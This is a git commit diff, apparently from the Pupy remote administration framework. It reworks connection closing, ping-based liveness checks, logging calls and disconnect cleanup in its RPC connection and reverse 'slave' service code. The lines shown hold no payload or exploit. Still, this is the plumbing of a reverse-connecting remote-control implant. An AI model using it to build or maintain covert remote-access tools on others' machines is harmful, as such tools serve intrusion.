[WIP] network: Do better job on checking connection

This commit is contained in:
Oleksii Shevchuk 2019-12-13 15:32:14 +02:00
parent e5a3c9665a
commit 7a6dcbc321
3 changed files with 152 additions and 64 deletions

View File

@ -194,35 +194,54 @@ class SyncRequestDispatchQueue(object):
except Full:
if __debug__:
syncqueuelogger.debug(
'Task not queued - no empty slots. Launch new worker (%s, %s)'.format(
self, self._pending_workers))
'Task not queued - no empty slots. Launch new worker (%s, %s)',
self, self._pending_workers)
pass
if not queued or not ack.wait(timeout=self.MAX_TASK_ACK_TIME, probe=0.1):
with self._workers_lock:
if self._closed:
if __debug__:
syncqueuelogger.debug(
'Queue (%s) closed, do not start new worker', self)
self._workers += 1
if self._workers > self._max_workers:
self._max_workers = self._workers
if __debug__:
syncqueuelogger.info(
'Max workers({}): {}'.format(self, self._max_workers))
'Max workers(%s): %s',
self, self._max_workers)
thread = Thread(
target=self._dispatch_request_worker,
name="SyncQueue Dispatcher"
)
thread.daemon = True
thread.start()
thread = Thread(
target=self._dispatch_request_worker,
name="SyncQueue Dispatcher"
)
thread.daemon = True
thread.start()
def close(self):
self._closed = True
while True:
with self._workers_lock:
self._closed = True
if __debug__:
syncqueuelogger.debug('Queue(%s) closing: %s', self)
try:
self._queue.put_nowait(None)
except Full:
break
while True:
try:
self._queue.put_nowait(None)
except Full:
break
except Exception as e:
if __debug__:
syncqueuelogger.exception('Queue(%s) close: error: %s', self, e)
if __debug__:
syncqueuelogger.debug('Queue(%s) closed', self)
class PupyConnection(Connection):
@ -257,6 +276,9 @@ class PupyConnection(Connection):
self._timer_event = None
self._timer_event_last = None
self._initialized = False
self._deinitialized = False
self._closing = False
if 'ping' in kwargs:
ping = kwargs.pop('ping')
@ -287,6 +309,9 @@ class PupyConnection(Connection):
logger.debug('New PupyConnection: (%s)', self)
def _on_sync_request_exception(self, exc):
if __debug__:
logger.debug('Connection(%s) - sync request exception %s', self, exc)
if not isinstance(exc, EOFError):
logger.exception('%s: %s', self, exc)
@ -477,12 +502,11 @@ class PupyConnection(Connection):
logger.debug(
'Dispatch async reply(%s): %s - complete', self, seq)
def close(self, _catchall=True):
with self._close_lock:
if self._closed:
return
def _close_rpyc(self, _catchall=True):
if self._closed:
return
self._closed = True
self._closed = True
if __debug__:
trace = traceback.extract_stack()
@ -491,8 +515,6 @@ class PupyConnection(Connection):
self, *trace[-2])
try:
self.buf_in.wake()
self._async_request(consts.HANDLE_CLOSE)
except EOFError, e:
logger.info(
@ -502,23 +524,76 @@ class PupyConnection(Connection):
except Exception:
if not _catchall:
raise
finally:
try:
self._cleanup(_anyway=True)
except Exception, e:
def _close_chan(self, _catchall=True):
if self._deinitialized:
if __debug__:
logger.debug('Connection(%s) - already deinitialized', self)
return
self._deinitialized = True
try:
if __debug__:
logger.debug('Connection(%s) - cleanup', self)
self._cleanup(_anyway=True)
if self._channel and hasattr(self._channel, 'wake'):
if __debug__:
logger.debug('Cleanup exception(%s): %s', self, e)
logger.debug('Connection(%s) - wake buf_in (%s)', self, self._channel)
pass
self._channel.wake()
_sync_events = self._sync_events.keys()
for lock in _sync_events:
lock = self._sync_events.get(lock)
if lock:
lock.set()
except Exception, e:
if __debug__:
logger.debug('Connection(%s) - cleanup exception - %s', self, e)
pass
if __debug__:
logger.debug('Connection(%s) - closed', self)
logger.debug('Connection(%s) - cleanup locks', self)
with self._sync_events_lock:
for lock in self._sync_events.values():
try:
lock.set()
except Exception as e:
if __debug__:
logger.exception(
'Connection(%s) - ack failed: %s', self, e)
pass
if __debug__:
try:
logger.debug('Connection(%s) - closed:', self)
except Exception as e:
logger.exception(e)
def close(self, _catchall=True):
with self._close_lock:
if self._closing:
return
self._closing = True
try:
self._close_rpyc(_catchall)
except Exception as e:
if __debug__:
logger.exception('Connection(%s) - rpyc close - %s', self, e)
pass
try:
self._close_chan(_catchall)
except Exception as e:
if __debug__:
logger.exception('Connection(%s) - chan close - %s', self, e)
pass
@property
def inactive(self):
@ -533,15 +608,19 @@ class PupyConnection(Connection):
logger.debug('Check timeout(%s) - start', self)
while (time.time() - now < timeout) and not self._last_ping and not self.closed:
time.sleep(1)
promise = self.async_request(consts.HANDLE_PING, 'ping', timeout=timeout)
if not self._last_ping:
logger.info('Check timeout(%s) - failed', self)
if not self.closed:
while (time.time() - now < timeout) and not self.closed:
if promise.expired:
logger.info('Check timeout(%s) - failed', self)
self.close()
else:
logger.debug('Check timeout(%s) - ok', self)
break
elif promise.ready:
logger.debug('Check timeout(%s) - ok', self)
self._initialized = True
break
else:
time.sleep(1)
if self._local_root:
t = Thread(
@ -555,7 +634,7 @@ class PupyConnection(Connection):
self._init_service()
except AttributeError:
# Connection was broken in the middle
pass
raise EOFError()
else:
logger.debug('Local root is absent')
@ -585,7 +664,12 @@ class PupyConnection(Connection):
self, type(e), e)
try:
data = self._serve()
timeout = None
if not self._initialized:
timeout = 1
data = self._serve(timeout)
self._dispatch(data)
continue

View File

@ -55,10 +55,12 @@ class PupyChannel(Channel):
self._recv_channel_lock = threading.Lock()
def consume(self):
return self.stream.consume()
if hasattr(self.stream, 'consume'):
return self.stream.consume()
def wake(self):
return self.stream.wake()
if hasattr(self.stream, 'wake'):
return self.stream.wake()
def recv(self):
# print "RECV", threading.currentThread()

View File

@ -126,30 +126,32 @@ class ReverseSlaveService(Service):
)
def on_disconnect(self):
if self.client.terminated:
return
for cleanup in self.exposed_cleanups:
try:
cleanup()
except Exception as e:
pupy.remote_error('Disconnect/cleanup: {}', e)
self.exposed_cleanups = []
try:
self._conn.close()
except:
pupy.remote_error('Disconnect/close: {}', e)
if self.client.terminated:
return
if os.name == 'posix':
for cleanup in self.exposed_cleanups:
try:
cleanup()
except Exception as e:
pupy.remote_error('Disconnect/cleanup: {}', e)
self.exposed_cleanups = []
finally:
try:
for _ in xrange(1024):
if not os.waitpid(-1, os.WNOHANG):
break
self._conn.close()
except Exception as e:
pupy.remote_error('Disconnect/close: {}', e)
except OSError:
pass
if os.name == 'posix':
try:
for _ in xrange(1024):
if not os.waitpid(-1, os.WNOHANG):
break
except OSError:
pass
def exposed_exit(self):
logger.debug('TERMINATION REQUEST')